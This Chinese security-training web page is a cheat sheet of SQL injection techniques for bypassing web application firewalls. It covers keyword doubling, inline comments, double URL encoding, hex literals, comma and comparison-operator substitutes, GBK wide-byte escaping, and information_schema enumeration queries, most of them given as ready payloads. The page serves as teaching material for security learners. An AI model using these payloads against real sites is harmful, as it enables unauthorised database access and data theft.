白帽子:SQL注入WAF绕过
最后更新 :2022.03.07
SQL注入WAF绕过
1 大小写绕过
此类绕过不经常使用,但是用的时候也不能忘了它,他原理是基于SQL语句不分大小写的,但过滤只过滤其中一种。
2 替换关键字
这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过
http://www.xx.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4
3 空格绕过
payload
select/**/*/**/from/**/yz;
select%0a*%0afrom%0ayz; %0a 是回车
select(a)from(yz);
select(a)from(yz)where(a=1);
4 内联注释
有些WAF的过滤关键词像/union\sselect/g,就比如上面说的,很多时候我都是采用内联注释。更复杂的例子需要更先进的方法。比如添加了SQL关键字,我们就要进一步分离这两个词来绕过这个过滤器。
id=1/*!UnIoN*/SeLeCT
/*!select*//*!**//*!from*//*!yz*/;
5 替换关键字
这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过
SELselectECT 1,2,3,4
6 URL编码
有时后台界面会再次URL解码所以这时可以利用二次编码解决问题
后台语句
$insert=$link->query(urldecode($_GET['id']));
$row=$insert->fetch_row();
select * from yz
select * from %2579%257a
7 十六进制绕过(引号绕过)
select a from yz where b=0x32;
select * from yz where b=char(0x32);
select * from yz where b=char(0x67)+char(0x75)+char(0x65)+char(0x73)+char(0x74)
select column_name from information_schema.tables where table_name="users"
select column_name from information_schema.tables where table_name=0x7573657273
8 逗号绕过
在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决。
substr(),mid()
mid(user() from 1 for 1)
substr(user() from 1 for 1)
select substr(user()from -1) from yz ;
select ascii(substr(user() from 1 for 1)) < 150;
同时也可以利用替换函数
select left(database(),2)>'tf';
selete * from testtable limit 2,1;
selete * from testtable limit 2 offset 1;
9 比较符(<,>)绕过
同样是在使用盲注的时候,在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符,那么就需要使用到greatest,strcmp来进行绕过了。
select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64
select strcmp(left(database(),1),0x32);#lpad('asd',2,0)
if(substr(id,1,1)in(0x41),1,3)
-- 新学习了一种骚骚的注入姿势in、between、order by
select * from yz where a in ('aaa');
select substr(a,1,1) in ('a') from yz ;
select * from yz where a between 'a' and 'b';
select * from yz where a between 0x89 and 0x90;
select * from yz union select 1,2,3 order by 1;
-- 也可以用like,根据排列顺序进行真值判断
10 注释符绕过
在注入时的注释符一般为# --当两者不能用时就不能闭合引号
这里介绍一个奇淫巧技
select 1,2,3 from yz where '1'/1=(1=1)/'1'='1'
(1=1)中就有了判断位为下面的注入打下基础
11 宽字节绕过
字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在%df\’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MySQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df\’ = %df%5c%27=縗’,有了单引号就好注入了。
注:select防止用户自定义的名称和mysql保留字冲突
12 with rollup
一般结合group by使用
select 1 as test from yz group by test with rollup limit 1 offset 1;
+------+
| test |
+------+
| NULL |
+------+
13 无列名注入
给未知列名起别名
select a from (select 1,2,3aunion select * from yz)v;
14 判断列数绕过
当order by 被过滤后就可以使用into 变量来绕过
select * from yz limit 1,1 into @a,@b,@c;
mysql数据库查询语句
select database(); #查选数据库
select group_concat(schema_name) from information_schema.schemata
select schema_name from information_schema.schemata limit 0,1 #查询数据库
select table_name from information_schema.tables where table_schema=database() limit 0,1; #查询表
select column_name from information_schema.columns where table_name='users' limit 0,1; #查询列
- END -
很多在选择网络安全工程师(黑客或白帽)与程序员如何纠结?
很多在选择网络安全工程师(黑客或白帽)与程序员有那些差别?有人说“要想成为高深的...
教育部:网络安全等16个领域纳入国家安全教育 大中小学全覆盖
从教育部获悉,为深入学习贯彻习近平总书记总体国家安全观,结合教育系统实际,教育部2020年9...
什么是网络安全监测工程师
什么是网络安全监测工程师网络安全监测工程师是网络安全大方向下网络安全应急与防御岗的...
网络安全真的值得学吗?有哪些就业方向呢?
在这个高度依赖网络的时代里,网络安全已经成为了大家共同关注的焦点。那么,网络安全真的值...
线上VS线下,网络安全培训的最佳选择是?
线上VS线下,网络安全培训的最佳选择是?随着数字化时代的快速发展,网络安全已成为企业和个人...
学网络安全为什么培训好?
学网络安全为什么培训好?根据最新版网络安全产业人才发展报告指出,在疫情常态化后,国内经济...
经济大萧条期间,要想翻身赚大钱,这个行业你必须知道!
经济大萧条期间,要想翻身赚大钱,这个行业你必须知道!近几年,疫情持续不断,各个行业都举步维艰。在这种大环境不好的情况下,很多人觉得今年好难,开始慢慢躺平。其实,不努力,明年和未来,三年会更加的难。不要把希望寄托在下一...
什么?Node.js文件上传漏洞竟能让攻击者轻松控制你的系统?!
在数字化时代,网络安全问题层出不穷,今天我们要聚焦于一个隐藏在Node.js中的潜在威胁。想象一下,一个看似普通的文件上传功能,竟然可能成为攻击者入侵系统的入口。通过精心设计的攻击链,黑客能悄无声息地接管整个系统。这...
小心!这些不起眼的日常小东西可以黑进你的设备
一、线缆(数据线)国外一个叫MG的小哥,曾制作了一个入侵数据线。攻击者可以利用它破坏苹果...
有哪些途径可寻找网络安全相关工作机会?如何准备网络安全面试?
有哪些途径可寻找网络安全相关工作机会?如何准备网络安全面试?作者:时间:2023-07-28 17:37:...
网络安全培训:线上VS线下,哪种更胜一筹?
网络安全培训:线上VS线下,哪种更胜一筹?在数字化时代,网络安全已成为企业和个人不可忽视的重...
怎么零基础入门网络安全?
怎么零基础入门网络安全?随着互联网的普及,网络安全成为越来越受重视的话题,求职热门岗位中...
有这个证书,网络安全工程师找工作不用愁
想要成为网络安全工程师,满足企业的用人要求。最基本的,你需要熟悉TCP/IP协议,熟悉sql注入...
设计专业想转行,做什么工作前景好,更赚钱?
由于设计行业的竞争越来越大,逐渐趋于饱和状态,导致在所有行业里是内卷最严重的行业。再...
网络安全需要学心理学吗
网络安全需要学心理学吗盾叔会经常收到一些小伙伴问这样一个问题:未来如果做网络安全工程...
网络安全培训学哪些内容才能就业?能做什么工作?薪资多少呢?
2021国家网络安全宣传周发布《网络安全人才发展报告》(以下简称“报告”)。调研...
IT运维工程师和网络安全运维工程师的区别
IT运维工程师和网络安全运维工程师的区别运维工程师和安全运维听起来,似乎是同样的职业。...
养老金收不抵支,学网络安全赢在未来
养老金收不抵支 未来你怎么办?你知道未来养老金的来源是什么吗?我们每个人工作后,都会缴纳...
微软被16岁男孩攻击后!网络安全师遭“哄抢”,成众多企业守护神
最近,网络安全圈子又出了一件大事,黑客组织Lapsus$黑进了微软,他们声称,从微软内部的Azure D...
什么是攻击面管理
什么是攻击面管理网络安全行业几十年的网络防御都是被动式防御。尽管被动的防御成本更低...
如何挑选一个靠谱的网络安全培训机构
如何挑选一个靠谱的网络安全培训机构作者:时间:2023-08-08 15:13:10网络安全培训 网...
入行网络安全需要学习哪些知识点?如何去学习网络安全呢?
网络安全已经进入持续火热的阶段之中,而且现在网络安全的需求量越来越高了,大家对于网络安...
网络安全培训费用多少?培训多久?线上还是线下好?
在数字化时代,网络安全已成为企业运营和个人信息安全不可或缺的一环。对于许多渴望转行或...
权威统计:全球八成的企业将增招IT和网络安全人员
某权威机构发布了《2022安全能力落差报告》,报告显示,安全能力差距将带给组织多重挑战,包括...
“云清洗”是什么意思?云清洗服务器能防御DDOS攻击吗?
相信大家在租用服务器时可以看到不少的专业名词,之前是很少接触到的。比如“云清洗”、“云清洗服务器”。那么“云清洗”指的是什么服务呢?清洗的又是什么?是不是我们通常理解的那种清洗呢?高防服务器“云清洗”一般指的...
什么是RCE漏洞?RCE漏洞会造成哪些危害呢?该如何防御?
什么是RCE漏洞?远程代码执行简称RCE,是一类软件安全缺陷/漏洞。RCE 漏洞将允许恶意行为人...
Chart GPT 暗黑版上线,网络安全问题已经显现
Chart GPT刚刚发布,一位不知名的作者将它的孪生兄弟“DAN”就在世界上最黑暗的暗网上线...
学网络安全需要什么基础?学什么内容呢?
众所周知,网络安全工程师是一个非常重要的职位。由于重要的薪水和发展前景肯定不差,所以很...
XR技术带来的“数据流动和隐私风险”
XR技术带来的“数据流动和隐私风险”什么是XR技术?XR为Extended Reality,包含了AR(增强现...
网络安全到底怎么学?网络安全培训哪里最好?最强总结来了!
现在越来越多应届生转行开始学习网络安全了,网络安全工程师成了不少人梦寐以求的职位。那...
黑客用AI换脸技术应聘 人工智能安全问题不容忽视
6月28日,FBI发布了一则公告,揭露了有人利用Deepfake技术,在远程应聘中假扮成他人的情况。美...
为什么现在都不爱发朋友圈了
你喜欢发朋友圈吗?原来我的朋友圈总可以看到一些奇奇怪怪的有趣灵魂。有拍照技术不行装逼...
国内黑产犯罪的严峻启示网络安全培训的重要性
国内黑产犯罪的严峻启示网络安全培训的重要性近年来,黑客犯罪日益突出,我国黑客案件破案数...
企业网络安全培训方案怎么写?一篇文章教会你
企业网络安全培训方案怎么写?一篇文章教会你随着数字化转型的推进,企业面临着越来越复杂和...
土木男不配拥有爱情?我只花了4个月就让前妻净身出户
现在回忆起那些不堪的过往,我还是会气到发抖。如果不是那天晚上的那通电话,我可能一直都无...
HTTP3协议的安全优势与挑战
HTTP/3是超文本传输协议(HTTP)的第三个正式版本,将改善网络性能和稳定性,解决各种安全隐私问...
网络安全培训内容有哪些?网络安全培训内容包含什么?
网络安全是现在互联网时代不可或缺的,相信有很多人都经历过资料外漏,或者经历过互联网诈骗...
纯小白如何选择网络安全方向
纯小白如何选择网络安全方向我们经常收到的一个问题,纯小白应该如何选择网络安全的方向?的...
如何防范社会工程学攻击
社会工程学,一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸多...
网络安全难学吗?前途又如何呢?
在这个高度依赖网络的时代里,网络安全已经成为了我们生活中不可或缺的一部分。然而,对于许...
警惕!免密支付陷阱频发,你的钱包还安全吗?
警惕!免密支付陷阱频发,你的钱包还安全吗?在一个阳光明媚的周末,小李正在悠闲地刷着手机,突然...
《2023年全球网络安全人才发展报告》主要内容
《2023年全球网络安全人才发展报告》主要内容国际信息系统安全认证联盟(ISC2)刚刚发布了20...
诈骗罪犯为何屡屡得手,你知道你的个人信息是怎么被泄漏的吗?
诈骗罪犯为何屡屡得手,你知道你的个人信息是怎么被泄漏的吗?今天,《中华人民共和国反电信...
什么是网络安全中的供应链攻击?
“供应链”这个概念对于不同的行业可以有不同的含义。在网络安全中可以解释为相互链接...
揭秘售后诈骗案:黑客软件如何轻松攻破系统防线?
在一个风和日丽的春日午后,四川南充仪陇县的一家电器售后服务店内,老板徐某山正埋头于电脑...
什么是网络安全?网络安全为什么如此重要?
网络安全至关重要,因为它保护所有形式的数据和信息,如敏感数据、个人识别信息(PII)、受保护...
怎么零基础入门网络安全?网络安全入门教程详解
怎么零基础入门网络安全?网络安全入门教程详解作者:时间:2023-07-14 17:24:02网络安全培训...
这三大主流木马程序 学网安的一定要了解
这三大主流木马程序 学网安的一定要了解作者:时间:2023-09-08 14:57:18网络安全培训 ...
等保2.0涉及的Apache Tomcat中间件(下)
一、访问控制首先这里的访问控制要求,就是针对tomcat管理控制台中的用户权限,即Tomcat Man...
警惕!这个黑客组织盯上了我国军工和高校
警惕!这个黑客组织盯上了我国军工和高校作者:时间:2023-06-15 15:16:25网络安全培训 ...
「网络安全基础知识」什么是SQL注入?SQL注入攻击的原理是什么?
什么是SQL注入?SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者...
应届生毕业找不到工作转行IT学网络安全可以吗?
应届生毕业找不到工作转行IT学网络安全可以吗?作者:时间:2023-08-11 11:21:02网络安全培...
「网络安全基础知识」什么是TCP/IP协议?有哪些作用?
什么是TCP/IP协议?TCP/IP(Transmission Control Protocol/Internet Protocol,传输控制协议...
某求职APP被“撞库”,这30万人赶紧改密码
某求职APP被“撞库”,这30万人赶紧改密码前不久,某互联网公司求职招聘类app的短...
做网络与基础架构安全产品的企业有哪些
网盾带你了解 那些做网络与基础架构安全产品的企业目前,我国以5G、物联网、云计算、工业...
什么是安全产品售前工程师
什么是安全产品售前工程师安全产品售前工程师是网络安全合规管理类岗位下的一个子类别。...
什么是区块链安全?
什么是区块链?区块链,就是一个又一个区块组成的链条。每一个区块中保存了一定的信息,它们按...
多所小学美术本印有涉黄二维码,真相竟是?
近期,有网友称其孩子的美术书被印了一个二维码,让人惊讶的是这个二维码一扫就会跳到一个...
一张图让你搞清楚网络安全的防护方式
一张图让你搞清楚网络安全的防护方式IPS :入侵防御系统(IPS: Intrusion Prevention Syst...
网络安全工程师必须了解的知识:“三保一评”是什么?
网络安全工程师必须了解的三保一评网络安全保护工作当中的3保1评指的是:分保、等保、关保...
计算机0基础怎么学渗透测试?
计算机0基础怎么学渗透测试?想必也是大都市小白想了解的话题,下面就给大家详细讲解一下:第...
【网络安全基础知识】什么是WAF绕过?WAF又是被如何绕过的呢?
【网络安全基础知识】什么是WAF绕过?WAF又是被如何绕过的呢?什么是WAF绕过?与传统的 Firew...
VBA清除技术可逃避杀毒软件的检测
VBA清除技术利用VBA的恶意MS Office文档将其VBA代码存储在“复合文件二进制格式”文...
网约车钓鱼执法可以反制,网络钓鱼你躲得过吗
昨天看到一则搞笑的视频。6月11号,哈尔滨一男子搭乘网约车的时候,要抽烟,被司机制止了。然...
武汉网络安全培训:至少已有7家新冠疫苗生产商遭到黑客攻击!
微软最近表示,它已检测到三个政府资助的黑客行动(也称为APT),并且已对参与研究和治疗新冠疫苗的至少七家知名公司发起了网络攻击。“最近几个月,我们发现了来自三个民族国家行为者的网络攻击。这些攻击针对的是直接参与新...
究竟什么是密码学?
什么是密码学?密码学(Cryptology)是一种用来混淆的技术,它希望将正常的、可识别的信息转变...
web前端和网络安全哪个更有前途?
近年来,IT产业发展迅速。纵观“新基建”的七大方向,大部分都涉及互联网IT行业,这...
网络安全真的那么好吗?普通人能学网络安全吗?
在当今这个数字化时代,网络已成为连接世界的桥梁,它渗透到我们生活的方方面面,从日常交流、...
境外对儿童价值观的渗透 可不止“人教教材”这一个方式
关于小学课本的问题,已经不是第一次上热搜了,但能让国人都愤怒的,这还是第一次。这次人教版...
自学网络安全能找到工作吗?
自学网络安全能找到工作吗?今天收到一条私信,一名刚高校毕业的应届生咨询盾叔,说自己毕业找...
企业在网络安全上“省钱”的方法
企业在网络安全上“省钱”的方法在当前经济寒冬中,网络犯罪和内部威胁愈发活跃...
网络安全培训好还是自学好?应该选哪种方式?
随着网络的飞速发展,安全问题也成为大家关心的问题。想要学习网络安全进入IT行业的小伙伴...
伊朗多次遭受黑客入侵,总统国庆日电视直播演讲竟被黑客恶意篡改
据新闻消息报道:在伊朗伊斯兰革命胜利44周年纪念日的当天,遭受到了黑客的组织破坏。这次...
零基础小白转行学网络安全,是否可行?
零基础小白转行学网络安全,是否可行?在现代社会中,网络安全已经成为了人们日常生活中不可或...
喜欢做善事的黑客你见过吗?
喜欢做善事的黑客你见过吗?最近有这么一个勒索软件出现在江湖之中,当你遭到它的攻击,要么暂...
大专想要拿高薪就去网络安全培训
很多大专毕业生都会遇到求职的困境,的确,对于一名大专生来说,大学毕业以后想要找到一份比较...
网盾将与奇安信联合开展QCCA认证培训
基于国家网络空间安全战略,围绕企业用户的网络安全人才需求,实现应用型网络安全人才能力的...
为啥黑客都喜欢盯着远程工作的你企业的员工?
为啥黑客都喜欢盯着远程工作的你企业的员工?后疫情时代,远程办公逐渐成为很多企业上班的...
当你还在迷茫学什么的时候,可以看看这份文件
建设数字中国是数字时代推进中国式现代化的重要引擎,是构筑国家竞争新优势的有力支撑。...
零基础学网络安全难吗?需要多少钱呢?
零基础学网络安全难吗?需要多少钱呢?零基础是什么学历?如果只是初中生建议不要学了,网络安...
65000条快递信息泄露,元凶竟然是“它”
如今在这个时代网上购物已经成了众多用户日常生活不可或缺的一部分。因此,快递面单就已经...
什么是云计算安全?云计算的三种服务模式
什么是云计算安全?云计算安全或云安全指一系列用于保护云计算数据、应用和相关结构的策略...
什么是系统安全需求分析师?
什么是系统安全需求分析师?系统安全需求分析师是网络安全大方向下网络安全规划与设计岗方...
罗翔的六句话,送给纠结要不要学网络安全的你
罗翔的六句话 送给纠结要不要学网络安全的你昨天在知乎看到这么一个回答,那种张口就来,没...
想学WEB渗透 武汉哪个网络安全培训机构好?
想学WEB渗透 武汉哪个网络安全培训机构好?作者:时间:2023-08-07 15:06:36网络安全培训 ...
我们的卫星接收器都被攻击了!太空网络安全出问题会怎样?
近期,Cyble Research Intelligence Labs (CRIL) 确定了黑客组织GhostSec参与了以卫星接...
科技股银行破产 经济危机来临,普通人的出路在哪?
3月10日,美国硅谷银行暴雷。股价单日暴跌60%,宣布关闭。2022年,硅谷银行资产规模为2118亿美...
史上最大规模数据泄漏:涉及巨量个人信息
史上最大规模数据泄漏:涉及巨量个人信息最近,安全研究专家Bob Dyachenko和Cybernews团队发...
工业工程专业想转行,做什么工作更有前景?
伴随着这几年的经济下行,国家的发展方向也逐渐发生变化。工业工程作为老牌的传统行业,在...
这些“诈骗”手段不知道,你的钱包绝对要空
这些“诈骗”手段不知道,你的钱包绝对要空一、增长速度最快的诈骗2023年,令人震...
交行一储户近43万元被盗走,人脸识别漏洞成作案工具
最近,交通银行人脸识别漏洞被攻破造成的账户资金盗刷的事件,备受大众关注。究竟是什么情况...
网络安全工程师都难逃电信诈骗,缅北真的无法无天了吗?
近几天,盾叔就遇到了好几起精准信息诈骗的事情。起因是这样的:有一个号称是贷款三方平台(...
网络安全里的通用解决方案是什么
什么是通用解决方案?通用解决方案其实是一种综合网络措施。有检测企业内部的邮件、MSN、Q...
信息时代网络安全的重要性表现在哪些方面?
在这个大数据时代,信息泄露成了一个不容忽视的问题,骚扰电话、诈骗短信层出不穷,信息安全问...
网络安全新手必看,你挖洞究竟可以赚多少米?
网络安全新手必看,你挖洞究竟可以赚多少米?很多小白都会在咨询中问我们,学了网络安全做哪个...
网络安全工程师难学吗?
前几天,又有一批学生从网上慕名而来,咨询到了网盾学院,希望从事网络安全相关的行业,他们是在...
在培训班学完网络安全真的能找到工作吗?
学技术,很多小伙伴都会选择参加培训,即便是网络安全也是如此。但在参加培训前,需要投入大量...
学历越高 工资就越高?
学历越高 工资就越高?几乎所有人都会认为,学历高,未来薪资就一定高。所以,从小到大,所有人都...
网络勒索再创新高!!你的犹豫只会给人可乘之机
哈喽,我是你们帅帅的盾叔,不知道大家听说了没。计算机巨头宏碁遭到了大牌黑客组织REvil的...
撕葱大众点评遭盗绑的原因是它!
首先,我们来看这个概念:撞库。撞库是黑客通过收集互联网已泄露的用户和密码信息,生成对应的...
- 数据加载中,请稍后...